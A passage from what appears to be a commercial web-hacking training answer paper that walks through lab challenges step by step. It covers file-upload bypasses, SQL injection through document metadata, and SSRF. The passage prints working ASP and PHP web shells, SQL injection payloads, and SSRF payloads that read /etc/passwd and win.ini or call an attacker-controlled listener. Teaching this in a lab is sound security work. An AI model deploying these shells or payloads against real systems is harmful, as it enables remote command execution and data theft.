Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Function getCommandOutput(theCommand)
Dim objShell, objCmdExec
Set objShell = CreateObject("WScript.Shell")
Set objCmdExec = objshell.exec(thecommand)
getCommandOutput = objCmdExec.StdOut.ReadAll
end Function
%>

<HTML>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)%>
</p>
<br>
</BODY>
</HTML>

Page: | 62

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

The application does not accept the asp file, as shown below:

Page: | 63

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 3: Try to upload other file extension config (web.config) using the following content. The
application will accept the config file. Refresh the Profile page and access the URL by right-clicking
on ‘Copy Image Location’. Add a parameter to the URL and provide the command that you wish to
execute and the page will display the output.

<?xml version="1.0" encoding="UTF-8"?>


<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule"
scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified"
requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>

<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Function getCommandOutput(theCommand)
Dim objShell, objCmdExec
Set objShell = CreateObject("WScript.Shell")
Set objCmdExec = objshell.exec(thecommand)
getCommandOutput = objCmdExec.StdOut.ReadAll
end Function
%>

<HTML>
<BODY>
<FORM action="" method="GET">

Page: | 64

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

<input type="text" name="cmd" size=45 value="<%= szCMD %>">


<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)%>
</p>
<br>
</BODY>
</HTML>

Page: | 65

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 4: Shell is uploaded and accessible.

Step 5: Execute the command “whoami” and check the output.

Page: | 66

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Bypassing File Validations #2


Challenge URL: http://shop.webhacklab.com/feedback.php

• Bypass the file validation checks to upload a web shell (userX.fileextension) and
execute commands on the host.

Solution:
Step 1: Navigate to the feedback functionality of the shopping application which allows uploading of
files. The functionality asks the user to upload an image file only. Upload an image to the application
and notice the image path. Try to upload a file with a non-image extension (e.g. php), the application
prompts a message “Only jpg/jpeg and png files are allowed”, as shown below:

Page: | 67

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 2: To bypass this client-side restriction, upload an image file with extension jpg/jpeg or png and
intercept the request. In the intercepted request change the value of the filename from image.png to
testX.php, also change the content of the image to php content:

<html>
<head>
<title>PHP Sample</title>
</head>
<body>
<?php echo '<p>Hello World</p>'; ?>
</body>
</html>

Step 3: The response shows that the php file was uploaded:

Page: | 68

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 4: Try to navigate to the uploaded ‘testX.php’ file. The PHP is not present at the server,
suggesting there is some server-side restriction as well. Replicating the method in Step 1, let’s try
some alternate file extensions such as php3/4/5, pht, phtml:

Step 5: Now try to access the uploaded php files with alternate file extensions. You will notice that
the PHTML file exists and renders the content, as shown below:

http://shop.webhacklab.com/images/feedback/testX.phtml

Page: | 69

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 6: Now try to upload a web-shell through a phtml file, with the following content:

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']);


system($cmd); echo "</pre>"; die; }?>

On trying to execute commands by accessing the web-shell through the URL


http://shop.webhacklab.com/images/feedback/test.phtml?cmd=pwd . This fails, suggesting the
function “system” might be blocked.

Try a variety of php functions which could allow command execution (passthru, shell_exec, exec,
system, proc_open) and upload with extension “phtml”. Identify the function(s) which executed.
Using the identified function “proc_open” create a webshell named userX.phtml and upload with the
“phtml” extension:

<?php
$descr = array( 0 => array('pipe', 'r') , 1 => array('pipe', 'w') , 2 =>
array('pipe', 'w'));
$pipes = array();
$process = proc_open("ls -l", $descr, $pipes);
if (is_resource($process))
{
while ($f = fgets($pipes[1]))
{
echo "-pipe 1--->";
echo $f;
}
fclose($pipes[1]);
while ($f = fgets($pipes[2]))
{
echo "-pipe 2--->";
echo $f;
}
fclose($pipes[2]);
proc_close($process);
}
?>

Page: | 70

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 7: Access this procopen.phtml file and the content of the command ls -l will be displayed on
the page:

Page: | 71

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

SQLi via File Metadata


Challenge URL: http://reimbursement.webhacklab.com/Expense/Add

• Identify and Exploit SQL Injection via File Metadata properties to retrieve current
database user and database name.

Solution:
Step 1: Sign in to the application and navigate to 'Expense' tab, click on 'Sample File' link and it will
download the 'SampleData.xls' as shown in the figure:

Page: | 72

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 2: Open the file with 'OpenOffice' and navigate to the 'File->Properties' as shown in the figure:

Page: | 73

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 3: Modify the 'Title' parameter and provide the payload 'SQLi’ ' and click on the 'OK' button as
shown in the figure:

Payload:

SQLi'

Step 4: Save the file and select 'Keep Current Format' option as shown in the figure:

Page: | 74

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 5: Navigate to 'Expense -> Add' and click on 'Browse' button and upload the file that was
modified in above step as shown in the figure:

Step 6: Observe Burp Request in which the payload was passed as shown in the figure:

Page: | 75

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 7: Application responds with Database error which means that the properties of 'Title' field
were vulnerable to SQL Injection as shown in the figure:

Step 8: In order to exploit further and to fetch the username, insert the following payload in 'Title'
field as shown in the figure:

Payload:

SQLi',(SELECT user_name()))--

Page: | 76

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 9: Upload the modified file from the above step as shown in the figure:

Step 10: The payload gets successfully executed and the server responds with 'File Uploaded
Successfully!!' message as shown in figure:

Page: | 77

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 11: Now to view expense details, Navigate to 'Expense -> View' as shown in figure:

Step 12: Username value is stored in the 'FileName' column as shown in the figure:

Page: | 78

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 13: To fetch the database name, modify the payload as shown in the figure:

Payload:

SQLi',(SELECT DB_NAME()))--

Step 14: Follow the same steps from Step 9 to Step 11 to fetch the database name as shown in
figure:

Page: | 79

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Module: Server Side Request


Forgery (SSRF)

SSRF To Check Open Ports and Fetch File


Challenge URL: http://shop.webhacklab.com/products.php

• Utilizing SSRF extract the contents of the internal file “/etc/passwd”.


• Identify the ports open on the host “http://192.168.200.10/”.

Solution:
Step 1: Navigate to the “Products” functionality of the application “NotSoSecure Sports Shop”:

Page: | 80

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 2: Notice that the application displays an external image by fetching it through the parameter
“imgurl”:

Step 3: Observe the same HTTP request from Burp Repeater:

Page: | 81

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 4: Provide “http://localhost” to “imgurl” parameter, we can observe that the application
displayed index page of localhost:

Step 5: To perform internal network scanning, we can either guess internal IP or bruteforce but as
we can also retrieve internal files, we can try to fetch internal IP from file “file:///etc/hosts”:

Page: | 82

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 6: So, we can try the retrieved internal IP “192.168.200.10”. Provide “http://192.168.200.10” to
“imgurl” parameter, we can observe that the application displayed same index page of
192.168.200.10(localhost):

Step 7: To perform host discovery using specific port, we can try with IP and port
“http://192.168.200.10:80”

Page: | 83

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 8: We can try with different IPs and port combinations and observe the response time which is
highlighted in Figure:

http://192.168.200.100:80

Step 9: To perform automated internal network scanning, we can use Burp Intruder and select the
last octet of IP address:

Page: | 84

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 10: In Burp Intruder, select the Payload type as “Numbers” and set Number range from 0 to
255 with incremental steps of 1:

Step 11: Observe the result table using columns “Response received” or “Length”, we can observe
that there are 6 other IPs which responded quickly (400-650 ms) compared to normal response
(3200-4200). Figure shows HTTP request for IP 192.168.200.110 which responded in 429
milliseconds:

Page: | 85

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 12: We can observe the HTTP response of above request for IP 192.168.200.110 on port 80:

Page: | 86

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 13: We have sorted the column “Response received” in ascending order but we need to also
check with descending order. Figure shows HTTP request for IP “192.168.200.120” which
responded in more than 60000 milliseconds. Hence, we can discover internal up hosts:

Page: | 87

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 14: To perform automated internal network scanning/service enumeration, we can use Burp
Intruder and select the last octet of IP address and also a port. We need to perform service
enumeration on multiple IPs so we can select “Cluster bomb” as an attack type:

Step 15: In Burp Intruder, select the Payload for the first position, here we are going to mention last
octet of IPs:

Page: | 88

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 16: In Burp Intruder, select the Payload for second position, here we are going to mention list
of ports/services to enumerate for IPs mentioned in above step:

Step 17: CAUTION: we are going to perform host/service discovery through web application, it
could be possible that a little mistake may ruin our plan by making multiple requests. Generally, it is
preferable to go with only “1” thread and with throttling request:

Page: | 89

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 18: Observe the result table using columns “Length” or “Response received”, we can observe
that there are 6 other services which have large response contents(167-11500 Bytes) comparing to
normal request(151 Bytes). Figure shows that HTTP request for IP 192.168.200.12 and port
80(service HTTP) which responded in 11476 Bytes.

Page: | 90

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 19: Observe the result table using columns “Length” for each ports/services, we can observe
that there are 5 other services which have variations in “Length”. However, this is a demo
application and we have restricted our result analysis to “Length” only but we can also compare
results with “Response received”.

Page: | 91

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 20: Observe the result table using columns “Length” or “Response received” for each
ports/services, we can observe that there are 2 other services(HTTP on port 8080) which have
variations in “Length”.

Page: | 92

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 21: We can also match our results with “Nmap” output as shown in below Figure:

root@Kali:~# nmap -F 192.168.200.0/24 -sT

Page: | 93

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 22: Similarly, fetch an internal file “/etc/passwd” using payload:

../../../../../../../etc/passwd

Page: | 94

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 23: Let’s try to fetch an internal file “/etc/passwd” from the host through file URI scheme:

http://shop.webhacklab.com/imagehandler.php?imgurl=file:///etc/passwd

Step 24: Fetch an internal file from the host through file URI scheme:

http://shop.webhacklab.com/imagehandler.php?imgurl=file:///var/www/html/admin.php

Page: | 95

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

SSRF via PDF Generation


Challenge URL: http://topup.webhacklab.com/Account/Profile

• Utilise PDF export injection to confirm SSRF using OOB channel.


• Retrieve the content of the internal file “win.ini”:

Solution:
Step 1: Login to the topup application using your account and visit user account profile page. You
can update the account information using this page:

Step 2: To identify SSRF in the above input field, OOB calls can be made using <iframe
src='http://192.168.4.X:8000'/>. Let’s try injecting the payload in the “billing address” field and
generate the PDF to understand the response coming from the server.

Page: | 96

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 3: Start HTTP webserver on your kali VM to get the http request logs, using the following
command:

Python3 -m http.server

Now make a top-up transaction, which will create a PDF invoice for the transaction details with the
help of user profile data.

Step 4: Output of python http web server logs will show that the http requests are being received by
the server and “Name” and “Billing Address” fields are vulnerable to SSRF.

Note: Each time you try this on different input fields, you need to generate an invoice PDF file using
a top-up transaction to get the http log output.

Step 5: Notice that the application is running over the IIS 8.5 and ASP.NET, hence we can consider
the windows specific payload to read the local content from the web server.

Page: | 97

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 6: The previous step confirms the presence of vulnerability on “Name” and “Billing Address”
fields. Add simple SSRF payload for reading the local web server file in to the “Name” and “Billing
Address” field - Here we have updated it in “Billing Address” field with below payload:

<iframe src='file:////C:\Windows\win.ini'></iframe>

Step 7: Using top-up option of the homepage, you need to proceed with a top-up and complete the
transaction. After completion of the successful transaction there will be a payment invoice created
and available in “My Orders” section. While generating the invoice, it fetched the transaction details
along with the profile information available with our payload.

Page: | 98

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 8: Navigating to “My Orders” page, you can see the recent order page for your transaction and
Click on the Download option. The download option will show a PDF file against your payload iframe
for Windows - win.ini file.

END OF PART - 3

Page: | 99

©
Claranet Cyber Security 2021. All rights reserved

Technet24

You might also like